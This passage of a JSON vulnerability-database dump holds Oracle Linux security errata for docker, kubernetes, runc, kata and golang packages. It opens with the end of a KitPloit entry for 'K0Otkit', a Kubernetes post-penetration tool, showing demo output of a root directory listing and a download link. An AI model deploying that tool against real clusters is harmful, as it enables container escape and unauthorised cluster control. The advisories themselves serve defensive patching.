2020-03-03 03:00:17 -0500 initrd.img.old \n 40755/rwxr-xr-x 4096 dir 2020-04-16 03:52:46 -0400 lib \n 40755/rwxr-xr-x 4096 dir 2020-03-03 02:33:23 -0500 lib64 \n 40700/rwx------ 16384 dir 2020-03-03 02:33:19 -0500 lost+found \n 40755/rwxr-xr-x 4096 dir 2020-03-03 02:33:29 -0500 media \n 40755/rwxr-xr-x 4096 dir 2020-03-03 02:33:23 -0500 mnt \n 40755/rwxr-xr-x 4096 dir 2020-04-16 03:59:01 -0400 opt \n 40555/r-xr-xr-x 0 dir 2020-04-09 21:32:01 -0400 proc \n 40700/rwx------ 4096 dir 2020-11-30 04:00:05 -0500 root \n 40755/rwxr-xr-x 1020 dir 2020-11-30 04:04:59 -0500 run \n 40755/rwxr-xr-x 12288 dir 2020-04-16 03:52:46 -0400 sbin \n 40755/rwxr-xr-x 4096 dir 2020-03-03 03:02:37 -0500 snap \n 40755/rwxr-xr-x 4096 dir 2020-03-03 02:33:23 -0500 srv \n 40555/r-xr-xr-x 0 dir 2020-04-14 22:51:06 -0400 sys \n 41777/rwxrwxrwx 4096 dir 2020-11-30 04:10:07 -0500 tmp \n 40755/rwxr-xr-x 4096 dir 2020-04-16 04:42:54 -0400 usr \n 40755/rwxr-xr-x 4096 dir 2020-03-03 02:5 1:25 -0500 var \n 100600/rw------- 6712336 fil 2020-03-05 22:22:58 -0500 vmlinuz \n 100600/rw------- 7184032 fil 2020-03-03 02:33:55 -0500 vmlinuz.old \n \n\n \n \n\n\n**[Download K0Otkit](<https://github.com/Metarget/k0otkit> \"Download K0Otkit\" )**\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2022-05-31T12:30:00", "type": "kitploit", "title": "K0Otkit - Universal Post-Penetration Technique Which Could Be Used In Penetrations Against Kubernetes Clusters", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5195", "CVE-2019-5736"], "modified": "2022-05-31T12:30:00", "id": "KITPLOIT:4830265851778950745", "href": "http://www.kitploit.com/2022/05/k0otkit-universal-post-penetration.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2021-07-28T14:24:37", "description": "docker-engine\n[19.03.1-1.0.0]\n- update to 19.03.1\n[19.03-0.0.1]\n- update to 19.03", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-12-05T00:00:00", "type": "oraclelinux", "title": "docker-engine docker-cli security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15664", "CVE-2019-14271"], "modified": "2019-12-05T00:00:00", "id": "ELSA-2019-4827", "href": "http://linux.oracle.com/errata/ELSA-2019-4827.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-30T06:24:38", "description": "kernel-uek-container\n[4.14.35-1902.303.5.3.el7]\n- rds: Deregister all FRWR mr with free_mr (Hans Westgaard Ry) [Orabug: 31476202]\n- Revert 'rds: Do not cancel RDMAs that have been posted to the HCA' (Gerd Rausch) [Orabug: 31475329]\n- Revert 'rds: Introduce rds_conn_to_path helper' (Gerd Rausch) [Orabug: 31475329]\n- Revert 'rds: Three cancel fixes' (Gerd Rausch) [Orabug: 31475318]\n[4.14.35-1902.303.5.2.el7]\n- rds: Three cancel fixes (Hakon Bugge) [Orabug: 31463014]\n[4.14.35-1902.303.5.1.el7]\n- x86/speculation: Add SRBDS vulnerability and mitigation documentation (Mark Gross) [Orabug: 31446720] {CVE-2020-0543}\n- x86/speculation: Add Special Register Buffer Data Sampling (SRBDS) mitigation (Mark Gross) [Orabug: 31446720] {CVE-2020-0543}\n- x86/cpu: Add 'table' argument to cpu_matches() (Mark Gross) [Orabug: 31446720] {CVE-2020-0543}\n- x86/cpu: Add a steppings field to struct x86_cpu_id (Mark Gross) [Orabug: 31446720] {CVE-2020-0543}\n[4.14.35-1902.303.5.el7]\n- net/mlx5: Decrease default mr cache size (Artemy Kovalyov) [Orabug: 31446379]\n[4.14.35-1902.303.4.el7]\n- net/rds: suppress memory allocation failure reports (Manjunath Patil) [Orabug: 31422157]\n- rds: Do not cancel RDMAs that have been posted to the HCA (Hakon Bugge) [Orabug: 31422151]\n- rds: Introduce rds_conn_to_path helper (Hakon Bugge) [Orabug: 31422151]\n- xen/manage: enable C_A_D to force reboot (Dongli Zhang) [Orabug: 31422147]\nkata-image\n[1.7.3-1.0.5.1]\n- Address Kata CVE 2023\nkata-runtime\n[1.7.3-1.0.5]\n- Address Kata CVE-2020-2023\n- Address Kata CVE-2020-2024\n- Address Kata CVE-2020-2025\n- Address Kata CVE-2020-2026\nkata\n[1.7.3-1.0.7]\n- Address CVE-2020-2023\n- Address CVE-2020-2024\n- Address CVE-2020-2025\n- Address CVE-2020-2026\nkubernetes\n[1.14.9-1.0.6]\n- CVE-2020-8559: Privilege escalation from compromised node to cluster\n- CVE-2020-8557: Node disk DOS by writing to container /etc/hosts\n[1.14.9-1.0.5]\n- Update dependency on Kata containers to a build that includes fixes for CVE-2020-2023 thru CVE-2020-2026\nolcne\n[1.0.5-3]\n- update registry image mirroring script\n[1.0.5-2]\n- CVE-2020-8559: Privilege escalation from compromised node to cluster\n- CVE-2020-8557: Node disk DOS by writing to container /etc/hosts\n- Update bootstrap scripts\n[1.0.5-1]\n- Update Kata Containers to address CVEs 2020-2023 thru 2020-2026", "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-07-22T00:00:00", "type": "oraclelinux", "title": "Unbreakable Enterprise kernel-container kata-image kata-runtime kata kubernetes olcne security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0543", "CVE-2020-2023", "CVE-2020-2024", "CVE-2020-2025", "CVE-2020-2026", "CVE-2020-8557", "CVE-2020-8559"], "modified": "2020-07-22T00:00:00", "id": "ELSA-2020-5766", "href": "http://linux.oracle.com/errata/ELSA-2020-5766.html", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:25:04", "description": "go-toolset\n[1.11.13-1]\n- Bump version to 1.11.13\n- Related: rhbz#1743204\n- Related: rhbz#1743206\ngolang\n[1.11.13-2]\n- Improve error message when using non-FIPS API in FIPS mode.\n- Fixes CVE-2019-9512.\n- Fixes CVE-2019-9514.\n- Resolves: rhbz#1745711\n- Resolves: rhbz#1745705\n[1.11.6-3]\n- Updates to be less strict on key size in FIPS mode\n- Resolves: rhbz#1731550\n[1.11.6-2]\n- Lock to specific OpenSSL version on build\n- Resolves: rhbz#1709606", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2019-09-17T00:00:00", "type": "oraclelinux", "title": "go-toolset:rhel8 security and bug fix update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-9512", "CVE-2019-9514"], "modified": "2019-09-17T00:00:00", "id": "ELSA-2019-2726", "href": "http://linux.oracle.com/errata/ELSA-2019-2726.html", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-07-28T14:25:07", "description": "[ 18.03.1.ol-0.0.15]\n- cherry-picked fix for CVE-2018-15664 from upstream\n[18.03.1.ol-0.0.14]\n- rebuild\n[18.03.1.ol-0.0.13]\n- update for CVE-2018-20699\n[18.03.1.ol-0.0.12]\n- correct the version string of containerd\n[18.03.1.ol-0.0.11]\n- update runc for CVE-2019-5736\n[18.03.1.ol-0.0.10]\n- update Go to version 1.10.8\n[18.03.1.ol-0.0.9]\n- correct changelog\n[18.03.1.ol-0.0.8]\n- fix [orabug 28452214] and [orabug 28461404]\n[18.03.1.ol-0.0.6]\n- obsolete/provide the docker package [orabug 28216396]\n- Fix docker plugin reference resolution [orabug 28376247]\n[18.03.1.ol-1.0.4]\n- Fixed issue where RPM overwrites config files\n[17.12.0.ol-1.0.1]\n- Update docker-engine package for upstream 17.12.0\n[17.09.1.ol-1.0.2]\n- Update docker-engine package for upstream 17.09.1\n[17.06.2.ol-1.0.1]\n- Update docker-engine package for upstream 17.06.2 [orabug 26673768]\n- Migrate to new 'ol'-based versioning\n- add docker-storage-config utility\n[17.03.1-ce-3.0.1]\n- Update docker-engine package for upstream 17.03.1\n- Enable configuration of Docker daemon via sysconfig [orabug 21804877]\n- Require UEK4 for docker 1.9 [orabug 22235639 22235645]\n- Add docker.conf for prelink [orabug 25147708]\n- Update oracle linux selinux policy to match upstream [orabug 25653794]\n- Use dockerd instead of docker daemon as it is deprecated [orabug 25653794]", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 6.0}, "published": "2019-08-19T00:00:00", "type": "oraclelinux", "title": "docker-engine security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15664", "CVE-2018-20699", "CVE-2019-5736"], "modified": "2019-08-19T00:00:00", "id": "ELSA-2019-4756", "href": "http://linux.oracle.com/errata/ELSA-2019-4756.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:24:29", "description": "buildah\n[1.14.9-1.0.1]\n- Fixes troubles with oracle registry login [Orabug: 29937283]\n[1.14.9-1]\n- update to https://github.com/containers/buildah/releases/tag/v1.14.9\n- Related: RHELPLAN-39206\n[1.14.8-2]\n- make container-selinux a soft dependency\n- Related: #1806044\n[1.14.8-1]\n- update to https://github.com/containers/buildah/releases/tag/v1.14.8\n- Related: RHELPLAN-39206\n[1.14.7-1]\n- initial rhel8-8.2.1 build\n- update to https://github.com/containers/buildah/releases/tag/v1.14.7\n- Related: RHELPLAN-39206\ncockpit-podman\n[17-1]\n- update to https://github.com/cockpit-project/cockpit-podman/releases/tag/17\n- Related: RHELPLAN-39206\n[16-1]\n- update to https://github.com/cockpit-project/cockpit-podman/releases/tag/v16\n- Related: RHELPLAN-39206\n[15-1]\n- update to https://github.com/cockpit-project/cockpit-podman/releases/tag/15\n- Related: RHELPLAN-39206\n[12-1]\n- Configure CPU share for system containers\n- Translation updates\nconmon\n[2:2.0.17-1.0.1]\n- Remove upstream references [Orabug: 30871880]\n[2:2.0.17-1]\n- update to https://github.com/containers/conmon/releases/tag/v2.0.17\n- Related: RHELPLAN-39206\n[2:2.0.16-1]\n- update to https://github.com/containers/conmon/releases/tag/v2.0.16\n- Related: RHELPLAN-39206\n[2:2.0.15-1]\n- update to 2.0.15\n- Related: #1821204\ncontainernetworking-plugins\n[0.8.6-1]\n- update to https://github.com/containernetworking/plugins/releases/tag/v0.8.6\n- Related: RHELPLAN-39206\n[0.8.5-1]\n- update to https://github.com/containernetworking/plugins/archive/v0.8.5.tar.gz\n- Related: RHELPLAN-39206\ncontainer-selinux\n[2:2.135.0-1]\n- update to https://github.com/containers/container-selinux/releases/tag/v2.135.0\n- Related: RHELPLAN-39206\n[2:2.134.0-1]\n- update to https://github.com/containers/container-selinux/releases/tag/v2.134.0\n- Related: RHELPLAN-39206\n[2:2.132.0-2]\n- sync with Fedora and install selinux contexts file into /usr/share/containers/selinux/contexts\n (thanks to Dan Walsh)\n- do not print error in RPM transaction log when customizable_types file is missing\n- Related: RHELPLAN-39206\n[2:2.132.0-1]\n- update to https://github.com/containers/container-selinux/releases/tag/v2.132.0\n- Related: RHELPLAN-39206\n[2:2.131.0-1]\n- update to https://github.com/containers/container-selinux/releases/tag/v2.131.0\n- Related: RHELPLAN-39206\n[2:2.130.0-1]\n- update to https://github.com/containers/container-selinux/releases/tag/v2.130.0\n- dont use macros in changelog\n- Related: #1821204\ncriu\n[3.14-2]\n- fix 'Need to fix bugs found by coverity.'\n- Resolves: #1838991\n[3.14-1]\n- update to https://github.com/checkpoint-restore/criu/releases/tag/v3.14\n- Related: RHELPLAN-39206\n[3.13-1]\n- update to 3.13\n- Related: RHELPLAN-39206\nfuse-overlayfs\n[1.0.0-2]\n- remove bogus Provides from spec\n- Related: RHELPLAN-39206\n[1.0.0-1]\n- update to https://github.com/containers/fuse-overlayfs/releases/tag/v1.0.0\n- Related: RHELPLAN-39206\nlibslirp\n[4.3.0-3]\n- fix static analysis issues merged upstream\n (https://gitlab.freedesktop.org/slirp/libslirp/-/merge_requests/41)\n- Related: #1823657\n[4.3.0-2]\n- initial libslirp build for container-tools 8.2.1 module\n- Resolves: #1823657\n[4.3.0-1]\n- New v4.3.0 release\npodman\n[1.9.3-2.0.1]\n- delivering fix for [Orabug: 29874238] by Nikita Gerasimov \n[1.9.3-2]\n- fix 'Signature verification incorrectly uses mirrors references'\n- Resolves: #1829061\n[1.9.3-1]\n- update to https://github.com/containers/libpod/releases/tag/v1.9.3\n- Related: RHELPLAN-39206\n[1.9.2-3]\n- fix 'Podman support for FIPS Mode requires a bind mount inside the container'\n- version the oci-systemd-hook obsolete\n- Related: #1784950\n- Related: #1836180\n[1.9.2-2]\n- obsolete oci-systemd-hook package\n- Resolves: #1836180\n[1.9.2-1]\n- update to https://github.com/containers/libpod/releases/tag/v1.9.2\n- Related: RHELPLAN-39206\n[1.9.1-2]\n- make container-selinux a soft dependency\n- Related: #1806044\n[1.9.1-1]\n- update to https://github.com/containers/libpod/releases/tag/v1.9.1\n- Related: RHELPLAN-39206\n[1.9.0-2]\n- remove containers-mounts.conf man page, this is shipped by skopeo: containers-common subpackage\n- Related: RHELPLAN-39206\n[1.9.0-1]\n- update to https://github.com/containers/libpod/releases/tag/v1.9.0\n- Related: RHELPLAN-39206\npython-podman-api\n[1.2.0-0.2.gitd0a45fe]\n- revert update to 1.6.0 due to new python3-pbr dependency which\n is not in RHEL\n- Related: RHELPLAN-25139\n[1.2.0-0.1.gitd0a45fe]\n- Initial package\nrunc\n[1.0.0-66.rc10]\n- drop container-selinux runtime dependency\n- Related: #1806044\n[1.0.0-65.rc10]\n- address CVE-2019-19921 by updating to rc10\n- Resolves: #1801887\n[1.0.0-64.rc9]\n- use no_openssl in BUILDTAGS (no vendored crypto in runc)\n- Related: RHELPLAN-25139\n[1.0.0-63.rc9]\n- be sure to use golang >= 1.12.12-4\n- Related: RHELPLAN-25139\n[1.0.0-62.rc9]\n- rebuild because of CVE-2019-9512 and CVE-2019-9514\n- Resolves: #1766331, #1766303\n[1.0.0-61.rc9]\n- update to runc 1.0.0-rc9 release\n- amend golang deps\n- fixes CVE-2019-16884\n- Resolves: #1759651\n[1.0.0-60.rc8]\n- Resolves: #1721247 - enable fips mode\n[1.0.0-59.rc8]\n- Resolves: #1720654 - rebase to v1.0.0-rc8\n[1.0.0-57.rc5.dev.git2abd837]\n- Resolves: #1693424 - podman rootless: cannot specify gid= mount options\n[1.0.0-56.rc5.dev.git2abd837]\n- change-default-root patch not needed as theres no docker on rhel8\n[1.0.0-55.rc5.dev.git2abd837]\n- Resolves: CVE-2019-5736\n[1.0.0-54.rc5.dev.git2abd837]\n- re-enable debuginfo\n[1.0.0-53.rc5.dev.git2abd837]\n- go toolset not in scl anymore\n[1.0.0-52.rc5.dev.git2abd837]\n- rebase\nskopeo\n[1:1.0.0-1.0.1]\n- Add oracle registry into the conf file [Orabug: 29845934 31306708]\n- Fix oracle registry login issues [Orabug: 29937192]\n[1:1.0.0-1]\n- update to https://github.com/containers/skopeo/releases/tag/v1.0.0\n- Related: RHELPLAN-39206\n[1:0.2.0-5]\n- follow Dans suggestion to deliver seccomp.json and storage.conf\n from Fedora and not directly from upstream yet\n- Related: RHELPLAN-39206\n[1:0.2.0-4]\n- re-include ppc64 arch, golang doesnt seem broken there any more\n- synchronize man pages and config files with upstream\n- Related: RHELPLAN-39206\n[1:0.2.0-3]\n- include and ship containers.conf\n- Resolves: #1826486\n[1:0.2.0-2]\n- add docker.io into the default registry list\n- Related: RHELPLAN-39206\n[1:0.2.0-1]\n- update to https://github.com/containers/skopeo/releases/tag/v0.2.0\n- initial rhel8-8.2.1 build\n- Related: RHELPLAN-39206\nslirp4netns\n[1.0.1-1]\n- update to https://github.com/rootless-containers/slirp4netns/archive/v1.0.1.tar.gz\n- Related: RHELPLAN-39206\n[0.4.3-1]\n- update to https://github.com/rootless-containers/slirp4netns/archive/v0.4.3.tar.gz\n- Related: RHELPLAN-39206", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-08-06T00:00:00", "type": "oraclelinux", "title": "container-tools:ol8 security, bug fix, and enhancement update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16884", "CVE-2019-19921", "CVE-2019-5736", "CVE-2019-9512", "CVE-2019-9514", "CVE-2020-1983"], "modified": "2020-08-06T00:00:00", "id": "ELSA-2020-3053", "href": "http://linux.oracle.com/errata/ELSA-2020-3053.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:24:52", "description": "kubernetes\n[1.9.11-2.2.1]\n- CVE-2019-6486\n[1.9.11-2.1.1]\n- Fix kubeadm-registry.sh\n- Use golang 1.9.3\n- [CVE-2018-1002105] Handle error responses from backends\n- Bump to v1.9.11\n[1.9.1-2.1.7]\n- [Orabug 27803001]\n[1.9.1-2.1.5]\n- Production built 1.9.1-2.1.5\n- Fix the upgrade version check\n- Remove w/a from [Orabug 27125915]\n[1.9.1-2.1.4.dev]\n- Make sure worker node upgrade properly\n- [Orabug 27649898]\n[1.9.1-2.1.3.dev]\n- Ensure that the runtime mounts RO volumes read-only [CVE-2017-1002102]\n- Update Dashboard version to v1.8.3 [CVE-2017-1002102]\n- Fix nested volume mounts for read-only API data volumes [CVE-2017-1002102]\n- Fixed kubeadm-setup.sh and kubeadm-registry.sh\n- Add feature gate for subpath [CVE-2017-1002101]\n- Add subpath e2e tests [CVE-2017-1002101]\n- Lock subPath volumes [CVE-2017-1002101]\n[1.9.1-2.0.2]\n- Add Major and Minor version\n- Production built 1.9.1-2.0.2\n[1.9.1-2.0.1]\n- Production built 1.9.1-2.0.1\n[1.9.1-1.0.8.dev]\n- Properly take care of KUBE_REPO_PREFIX for worker upgrade\n- In restart case, take care of no image case\n[1.9.1-1.0.7.dev]\n- Fix apiserver-cert-extra-sans\n- [Orabug 27531451]\n[1.9.1-1.0.6.dev]\n- Also need to fix the repo location\n[1.9.1-1.0.5.dev]\n- [Orabug 27481302]\n[1.9.1-1.0.4.dev]\n- In the restart check image could be empty\n[1.9.1-1.0.3.dev]\n- [Orabug 27486461]\n[1.9.1-1.0.2.dev]\n- Occasionally pod-infra-container-image doesn't get propagate\n[1.9.1-1.0.1.dev]\n- Fix kubeadm-setup.sh for v1.9.1\n- Fix kubeadm-registry.sh for v1.9.1\n- Upstream modifications for Oracle\n- Update to v1.9.1\n[1.8.4-2.0.1]\n- If KUBE_REPO_PREFIX is not set then initialized to default registry\n- Built production 1.8.4-2.0.1\n[1.8.4-1.2.3.dev]\n- [Orabug 27256199]\n[1.8.4-1.2.2.dev]\n- Remove -beta.0 string from the pkg\n- Check and create /var/run/kubeadm early and once\n[1.8.4-1.2.1.dev]\n- Fix kubeadm-registry.sh default to 1.8.4\n- [Orabug 27248937]\n[1.8.4-1.2.0.dev]\n- Update to v1.8.4\n- Upstream code changes\n- Support upgrade from a lower version of 1.8 to a higher one\n- KUBE_GIT_TREE_STATE='git archive' breaks build\n- Modify KUBE_GIT_VERSION in kubernetes.spec\n- Take care of kubeadm-setup.sh to allow swap for now\n[1.8.1-2.0.1]\n- Built production 1.8.1-2.0.1\n[1.8.1-1.1.9]\n- Change kubeadm to requires kubelet and kubectl\n- Fix kubeadm command line failure\n[1.8.1-1.1.8.rc2]\n- Remove --skip flag on upgrade path\n- [Orabug 27125915]\n- Enabling kubectl-proxy.service for dashboard\n- Include service-cluster-ip-range in the NO_PROXY for upgrade\n[1.8.1-1.1.7.rc1]\n- Improve on OCR registry mirror optimization\n- Fix upgrade to allow 1.7 or 1.8 kubelet/kubectl\n[1.8.1-1.1.6.dev]\n- Fix upgrade check of apiserver image version\n- OCI REGISTRY optimization\n- Modify flannel ip on the /tmp file instead of the original\n- Include api advertise-address in NO_PROXY during upgrade\n- Make the token to expiry in 24 hr in the upgrade case\n- Add kubeadm-registry.sh\n[1.8.1-1.1.5.dev]\n- Start kubectl-proxy.service automatically for dashboard\n- Fix unbound variable for check\n- Upgrade restore and flannel upgrade capability\n- Include version info in backup and restore\n- Take care of kubeadm init and join parameters checking\n[1.8.1-1.1.4.dev]\n- Optimize dashboard creation\n- Fixup upgrade\n- Fixup upgrade 2.0\n- Cleanup /var/lib/cni as stale ip files could create network issues\n- Only display WARNING for [kubeadm]\n[1.8.1-1.0.4.dev]\n- Re-enable kubernetes-dashboard\n- Upgrade modifications\n- Make dashboard into a function\n- Optimize dashboard creation\n- Fixup upgrade\n- Fixup upgrade 2.0\n[1.8.1-1.0.3.dev]\n- Add discovery-token-ca-cert-has to kubeadm::join\n- Additional things to cleanup in kubeadm::down\n- Fix kubelet failure for 1.8\n- Don't reload firewall rule in --skip case for consistency\n[1.8.1-1.0.2.dev]\n- Implement upgrade capability\n- Bringing back KUBE_REPO_PREFIX\n- WORKAROUND FOR LACK OF OCR\n[1.8.1-1.0.1.dev]\n- Update to v1.8.1\n- kubeadm doesn't require kubelet and kubectl anymore\n- optimize firewalld checking\n- move repo check to its own function + OCI repo check\n- --fail-swap-on=false on kubelet for backwards compatibility\n[1.7.4-2.0.7.dev]\n- [Orabug 26926112]\n- Put 100% completed message\n[1.7.4-2.0.6.dev]\n- --skip-preflight-checks doesn't check kubelet status\n- TRAP cleanup background processes\n[1.7.4-2.0.5.dev]\n- [Orabug 26866772]\n- Include rough % completed for kubeadm-setup.sh up\n- Extend the usage of kubeadm-setup up\n[1.7.4-2.0.4.dev]\n- Check is /sbin in the PATH\n- Implement init command as such more 'kubeadm init' options can be used\n- Implement a spinning progress bar in case downloading takes a while\n[1.7.4-2.0.1]\n- Update to v1.7.4\n- [Orabug 26677088] kube-dns failure with iptables services\n[1.6.4-2.0.1]\n- Update to v1.6.4\n- Include kubeadm-setup.sh for ease of provisioning via kubeadm with Oracle Linux\nkubernetes-cni\n[0.6.0-2.1.1]\n- CVE-2019-6486\n[0.6.0-2.0.1]\n- Production built 0.6.0-2.0.1\n[0.6.0-1.0.1]\n- Update to v0.6.0\n[0.5.2-2.0.1]\n- Update to v0.5.2\nkubernetes-cni-plugins\n[0.6.0-2.1.1]\n- CVE-2019-6486\n[0.6.0-2.0.1]\n- Production built 0.6.0-2.0.1\n[0.6.0-1.0.1.dev]\n- Update to v0.6.0", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-02-14T00:00:00", "type": "oraclelinux", "title": "kubernetes security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1002101", "CVE-2017-1002102", "CVE-2018-1002105", "CVE-2019-6486"], "modified": "2019-02-14T00:00:00", "id": "ELSA-2019-4546", "href": "http://linux.oracle.com/errata/ELSA-2019-4546.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-30T06:24:21", "description": "buildah\n[1.5-6.0.1.gite94b4f9]\n- Fixes troubles with oracle registry login [Orabug: 29937283]\n[1.5-6.gite94b4f9]\n- rebuild because of CVE-2019-9512 and CVE-2019-9514\n- Resolves: #1766309\ncontainernetworking-plugins\n[0.7.4-4.git9ebe139]\n- rebuild because 